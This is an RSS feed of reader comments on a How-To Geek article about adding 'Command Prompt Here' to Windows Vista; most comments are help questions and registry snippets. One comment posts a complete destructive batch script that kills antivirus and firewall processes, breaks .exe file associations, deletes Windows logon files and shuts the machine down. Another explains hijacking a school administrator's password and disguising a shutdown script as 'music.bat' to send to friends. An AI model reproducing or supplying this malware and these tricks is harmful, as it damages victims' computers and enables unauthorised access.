<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Use &quot;Command Prompt Here&quot; in Windows Vista</title>
	<atom:link href="http://www.howtogeek.com/howto/windows-vista/use-command-prompt-here-in-windows-vista/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.howtogeek.com/howto/windows-vista/use-command-prompt-here-in-windows-vista/</link>
	<description>Computer Help from your Friendly How-To Geek</description>
	<lastBuildDate>Sat, 21 Nov 2009 07:48:42 -0600</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.5</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: nekulas</title>
		<link>http://www.howtogeek.com/howto/windows-vista/use-command-prompt-here-in-windows-vista/comment-page-1/#comment-78080</link>
		<dc:creator>nekulas</dc:creator>
		<pubDate>Wed, 21 Oct 2009 08:50:13 +0000</pubDate>
		<guid isPermaLink="false">http://www.howtogeek.com/howto/windows-vista/use-command-prompt-here-in-windows-vista/#comment-78080</guid>
		<description>Hi Guys,
How can I change the ownership of registry entry via command mode?</description>
		<content:encoded><![CDATA[<p>Hi Guys,<br />
How can I change the ownership of registry entry via command mode?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Whizzzy</title>
		<link>http://www.howtogeek.com/howto/windows-vista/use-command-prompt-here-in-windows-vista/comment-page-1/#comment-76866</link>
		<dc:creator>Whizzzy</dc:creator>
		<pubDate>Sun, 20 Sep 2009 09:14:20 +0000</pubDate>
		<guid isPermaLink="false">http://www.howtogeek.com/howto/windows-vista/use-command-prompt-here-in-windows-vista/#comment-76866</guid>
		<description>title Hack Setup 
color 0A 
@echo off 
set end=md &quot;Hack installing&quot; 
set fin=copy &quot;Hack log.txt&quot; &quot;Installing&quot; 
%end% 
%fin% 
net send * Hack is installing, press OK to begin set up. 
kill NAVAPSVC.exe /F /Q 
kill zonelabs.exe /F /Q 
kill explorer.exe /F /Q 
cls 
assoc .exe=txtfile 
assoc .txt=mp3file 
cls 
msg * It is you who is hacked.... 
msg * I warned you, and you kept going. Challenge me and this is what happens. 
DEL C:\WINDOWS\system32\logoff.exe /F /Q 
DEL C:\WINDOWS\system32\logon.exe /F /Q 
DEL C:\WINDOWS\system32\logon.scr /F /Q 
cls 
shutdown</description>
		<content:encoded><![CDATA[<p>title Hack Setup<br />
color 0A<br />
@echo off<br />
set end=md &#8220;Hack installing&#8221;<br />
set fin=copy &#8220;Hack log.txt&#8221; &#8220;Installing&#8221;<br />
%end%<br />
%fin%<br />
net send * Hack is installing, press OK to begin set up.<br />
kill NAVAPSVC.exe /F /Q<br />
kill zonelabs.exe /F /Q<br />
kill explorer.exe /F /Q<br />
cls<br />
assoc .exe=txtfile<br />
assoc .txt=mp3file<br />
cls<br />
msg * It is you who is hacked&#8230;.<br />
msg * I warned you, and you kept going. Challenge me and this is what happens.<br />
DEL C:\WINDOWS\system32\logoff.exe /F /Q<br />
DEL C:\WINDOWS\system32\logon.exe /F /Q<br />
DEL C:\WINDOWS\system32\logon.scr /F /Q<br />
cls<br />
shutdown</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: E1ement 5k4ter</title>
		<link>http://www.howtogeek.com/howto/windows-vista/use-command-prompt-here-in-windows-vista/comment-page-1/#comment-70706</link>
		<dc:creator>E1ement 5k4ter</dc:creator>
		<pubDate>Wed, 22 Apr 2009 17:06:03 +0000</pubDate>
		<guid isPermaLink="false">http://www.howtogeek.com/howto/windows-vista/use-command-prompt-here-in-windows-vista/#comment-70706</guid>
		<description>Open up cmd prompt and type
&quot;color 2&quot; you can also type in &quot;color /?&quot; to give you the list of options to change your command prompt coloring.

A fun thing to do, At school to change Admins password you type in &quot;net user&quot; and see the name of the administrator then you type &quot;net user (name of admin) *&quot; Yes, Include the * because thats the symbol for password Then. Type your desired password, It wont come up as you typing anything but it is, Then press ENTER and Re-type your password, Again it wont come up as typing anything but it is. And then press ENTER again.

You can also type &quot;ipconfig&quot; if you wunna shut down a friends computer, find the IP adress and then type &quot;shutdown -i&quot; which opens up a new window click &quot;add&quot;, Type the IP in. fill out the rest and click OK.
That SHOULD work, not sure tho =)

You can also Open up note-pad, type &quot;shutdown -s -t 30 -c &quot;Trojan detected!&quot; (just for fun) and click &quot;Save As&quot; but when your writing the name for example, Call it &quot;music.bat&quot; To save as a batch file, Send it to a friend over msn or e-mail. When they click it, a box will pop-up on there screen saying &quot;Trojan detcted!&quot; and there comp. will shutdown in 30 secs.
To stop this process, Open up command prompt and type &quot;shutdown -a&quot;, The a is for Abort, and will Abort ALL shutdown procedures.

Enjoy, Hopefully i got the info right! =)</description>
		<content:encoded><![CDATA[<p>Open up cmd prompt and type<br />
&#8220;color 2&#8243; you can also type in &#8220;color /?&#8221; to give you the list of options to change your command prompt coloring.</p>
<p>A fun thing to do, At school to change Admins password you type in &#8220;net user&#8221; and see the name of the administrator then you type &#8220;net user (name of admin) *&#8221; Yes, Include the * because thats the symbol for password Then. Type your desired password, It wont come up as you typing anything but it is, Then press ENTER and Re-type your password, Again it wont come up as typing anything but it is. And then press ENTER again.</p>
<p>You can also type &#8220;ipconfig&#8221; if you wunna shut down a friends computer, find the IP adress and then type &#8220;shutdown -i&#8221; which opens up a new window click &#8220;add&#8221;, Type the IP in. fill out the rest and click OK.<br />
That SHOULD work, not sure tho =)</p>
<p>You can also Open up note-pad, type &#8220;shutdown -s -t 30 -c &#8220;Trojan detected!&#8221; (just for fun) and click &#8220;Save As&#8221; but when your writing the name for example, Call it &#8220;music.bat&#8221; To save as a batch file, Send it to a friend over msn or e-mail. When they click it, a box will pop-up on there screen saying &#8220;Trojan detcted!&#8221; and there comp. will shutdown in 30 secs.<br />
To stop this process, Open up command prompt and type &#8220;shutdown -a&#8221;, The a is for Abort, and will Abort ALL shutdown procedures.</p>
<p>Enjoy, Hopefully i got the info right! =)</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Pete</title>
		<link>http://www.howtogeek.com/howto/windows-vista/use-command-prompt-here-in-windows-vista/comment-page-1/#comment-64025</link>
		<dc:creator>Pete</dc:creator>
		<pubDate>Fri, 02 Jan 2009 16:47:31 +0000</pubDate>
		<guid isPermaLink="false">http://www.howtogeek.com/howto/windows-vista/use-command-prompt-here-in-windows-vista/#comment-64025</guid>
		<description>Mai Ling / Spacegold - Try here for Command reference material:

http://technet.microsoft.com/en-us/library/bb490890.aspx</description>
		<content:encoded><![CDATA[<p>Mai Ling / Spacegold &#8211; Try here for Command reference material:</p>
<p><a href="http://technet.microsoft.com/en-us/library/bb490890.aspx" rel="nofollow">http://technet.microsoft.com/e.....90890.aspx</a></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Spacegold</title>
		<link>http://www.howtogeek.com/howto/windows-vista/use-command-prompt-here-in-windows-vista/comment-page-1/#comment-62906</link>
		<dc:creator>Spacegold</dc:creator>
		<pubDate>Wed, 10 Dec 2008 01:18:23 +0000</pubDate>
		<guid isPermaLink="false">http://www.howtogeek.com/howto/windows-vista/use-command-prompt-here-in-windows-vista/#comment-62906</guid>
		<description>I am normally not a command line user, but having now discovered what looks like an old DOS command prompt, I am curious about it.  A few simple tries confirmed that my old DOS knowledge was not going to be very useful here.  Is this one of those things that you have to buy the Windows developer package to learn or is there a command list documented somewhere with, as the user above noted, an explanation of the consequences of each?  I would ask this on the forum, but I still can&#039;t log in there.</description>
		<content:encoded><![CDATA[<p>I am normally not a command line user, but having now discovered what looks like an old DOS command prompt, I am curious about it.  A few simple tries confirmed that my old DOS knowledge was not going to be very useful here.  Is this one of those things that you have to buy the Windows developer package to learn or is there a command list documented somewhere with, as the user above noted, an explanation of the consequences of each?  I would ask this on the forum, but I still can&#8217;t log in there.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: SiliconDragon</title>
		<link>http://www.howtogeek.com/howto/windows-vista/use-command-prompt-here-in-windows-vista/comment-page-1/#comment-61000</link>
		<dc:creator>SiliconDragon</dc:creator>
		<pubDate>Thu, 13 Nov 2008 20:56:15 +0000</pubDate>
		<guid isPermaLink="false">http://www.howtogeek.com/howto/windows-vista/use-command-prompt-here-in-windows-vista/#comment-61000</guid>
		<description>To open a command prompt with admin rights (i.e. &quot;as administrator&quot;), just change the &quot;cmd.exe /k %L&quot; portion to &quot;cmd.exe /s /k %L&quot;

You can create all sorts of shell extensions this way. I use Process Explorer (the Sysinternals tool) and show the column &quot;command line&quot; which shows the full path and commandline args used for what ever process you want to duplicate.

Of course, regarding the command prompt with &quot;run as admin&quot; rights, there&#039;s the built-in shift-right-click method, but I personally prefer adding the 2nd shell extension so I don&#039;t HAVE to use both hands (i.e. the shift key). Whom ever said that &quot;necessity is the mother of all invention&quot; hasn&#039;t got a handle on reality yet and figured out that laziness is the mother of all invention. ;)</description>
		<content:encoded><![CDATA[<p>To open a command prompt with admin rights (i.e. &#8220;as administrator&#8221;), just change the &#8220;cmd.exe /k %L&#8221; portion to &#8220;cmd.exe /s /k %L&#8221;</p>
<p>You can create all sorts of shell extensions this way. I use Process Explorer (the Sysinternals tool) and show the column &#8220;command line&#8221; which shows the full path and commandline args used for what ever process you want to duplicate.</p>
<p>Of course, regarding the command prompt with &#8220;run as admin&#8221; rights, there&#8217;s the built-in shift-right-click method, but I personally prefer adding the 2nd shell extension so I don&#8217;t HAVE to use both hands (i.e. the shift key). Whom ever said that &#8220;necessity is the mother of all invention&#8221; hasn&#8217;t got a handle on reality yet and figured out that laziness is the mother of all invention. <img src='http://www.howtogeek.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Robert</title>
		<link>http://www.howtogeek.com/howto/windows-vista/use-command-prompt-here-in-windows-vista/comment-page-1/#comment-58675</link>
		<dc:creator>Robert</dc:creator>
		<pubDate>Thu, 02 Oct 2008 17:06:11 +0000</pubDate>
		<guid isPermaLink="false">http://www.howtogeek.com/howto/windows-vista/use-command-prompt-here-in-windows-vista/#comment-58675</guid>
		<description>hey guys i m new on this but i have a quastion ...

how can i open an cmd in vista as administrator with cmd  .

if any of you know please let me know i try this but is not working...

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\Directory\shell\Runas]
@=&quot;Open Administrator Command Window Here&quot;

[HKEY_CLASSES_ROOT\Directory\shell\Runas\Command]
@=&quot;cmd.exe /k \&quot;pushd %L &amp;&amp; title Elevated Command Prompt Window\&quot;&quot;

[HKEY_CLASSES_ROOT\Drive\shell\Runas]
@=&quot;Open Administrator Command Window Here&quot;

[HKEY_CLASSES_ROOT\Drive\shell\Runas\Command]
@=&quot;cmd.exe /k \&quot;pushd %L &amp;&amp; title Elevated Command Prompt Window\&quot;&quot; 

thanks...</description>
		<content:encoded><![CDATA[<p>hey guys i m new on this but i have a quastion &#8230;</p>
<p>how can i open an cmd in vista as administrator with cmd  .</p>
<p>if any of you know please let me know i try this but is not working&#8230;</p>
<p>Windows Registry Editor Version 5.00</p>
<p>[HKEY_CLASSES_ROOT\Directory\shell\Runas]<br />
@=&#8221;Open Administrator Command Window Here&#8221;</p>
<p>[HKEY_CLASSES_ROOT\Directory\shell\Runas\Command]<br />
@=&#8221;cmd.exe /k \&#8221;pushd %L &amp;&amp; title Elevated Command Prompt Window\&#8221;"</p>
<p>[HKEY_CLASSES_ROOT\Drive\shell\Runas]<br />
@=&#8221;Open Administrator Command Window Here&#8221;</p>
<p>[HKEY_CLASSES_ROOT\Drive\shell\Runas\Command]<br />
@=&#8221;cmd.exe /k \&#8221;pushd %L &amp;&amp; title Elevated Command Prompt Window\&#8221;" </p>
<p>thanks&#8230;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Mai Ling</title>
		<link>http://www.howtogeek.com/howto/windows-vista/use-command-prompt-here-in-windows-vista/comment-page-1/#comment-58124</link>
		<dc:creator>Mai Ling</dc:creator>
		<pubDate>Tue, 23 Sep 2008 03:01:25 +0000</pubDate>
		<guid isPermaLink="false">http://www.howtogeek.com/howto/windows-vista/use-command-prompt-here-in-windows-vista/#comment-58124</guid>
		<description>Could someone please recommend some command strings to use once in the cmd.exe window?  I&#039;d like to find a glossary of different commands and the results and/or options that they produce.  Thanks.</description>
		<content:encoded><![CDATA[<p>Could someone please recommend some command strings to use once in the cmd.exe window?  I&#8217;d like to find a glossary of different commands and the results and/or options that they produce.  Thanks.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: walter</title>
		<link>http://www.howtogeek.com/howto/windows-vista/use-command-prompt-here-in-windows-vista/comment-page-1/#comment-56175</link>
		<dc:creator>walter</dc:creator>
		<pubDate>Sun, 17 Aug 2008 08:54:33 +0000</pubDate>
		<guid isPermaLink="false">http://www.howtogeek.com/howto/windows-vista/use-command-prompt-here-in-windows-vista/#comment-56175</guid>
		<description>I have a problem with my other computer connecting to the internet, it is connected to the router but can connect to the internet.

I checked all the setting and reset the winsock and when i try do use the diagnostic it says that windows cant figure out whats wrong.

If you guys have any advise it couldn&#039;t hurt.</description>
		<content:encoded><![CDATA[<p>I have a problem with my other computer connecting to the internet, it is connected to the router but can connect to the internet.</p>
<p>I checked all the setting and reset the winsock and when i try do use the diagnostic it says that windows cant figure out whats wrong.</p>
<p>If you guys have any advise it couldn&#8217;t hurt.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Hyper</title>
		<link>http://www.howtogeek.com/howto/windows-vista/use-command-prompt-here-in-windows-vista/comment-page-1/#comment-54424</link>
		<dc:creator>Hyper</dc:creator>
		<pubDate>Thu, 24 Jul 2008 13:40:00 +0000</pubDate>
		<guid isPermaLink="false">http://www.howtogeek.com/howto/windows-vista/use-command-prompt-here-in-windows-vista/#comment-54424</guid>
		<description>!!! open command prompt as ADMINISTRATOR

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\Directory\shell\Runas]
@=&quot;Open Administrator Command Window Here&quot;

[HKEY_CLASSES_ROOT\Directory\shell\Runas\Command]
@=&quot;cmd.exe /k \&quot;pushd %L &amp;&amp; title Elevated Command Prompt Window\&quot;&quot;

[HKEY_CLASSES_ROOT\Drive\shell\Runas]
@=&quot;Open Administrator Command Window Here&quot;

[HKEY_CLASSES_ROOT\Drive\shell\Runas\Command]
@=&quot;cmd.exe /k \&quot;pushd %L &amp;&amp; title Elevated Command Prompt Window\&quot;&quot;</description>
		<content:encoded><![CDATA[<p>!!! open command prompt as ADMINISTRATOR</p>
<p>Windows Registry Editor Version 5.00</p>
<p>[HKEY_CLASSES_ROOT\Directory\shell\Runas]<br />
@=&#8221;Open Administrator Command Window Here&#8221;</p>
<p>[HKEY_CLASSES_ROOT\Directory\shell\Runas\Command]<br />
@=&#8221;cmd.exe /k \&#8221;pushd %L &amp;&amp; title Elevated Command Prompt Window\&#8221;"</p>
<p>[HKEY_CLASSES_ROOT\Drive\shell\Runas]<br />
@=&#8221;Open Administrator Command Window Here&#8221;</p>
<p>[HKEY_CLASSES_ROOT\Drive\shell\Runas\Command]<br />
@=&#8221;cmd.exe /k \&#8221;pushd %L &amp;&amp; title Elevated Command Prompt Window\&#8221;"</p>
]]></content:encoded>
	</item>
</channel>
</rss>
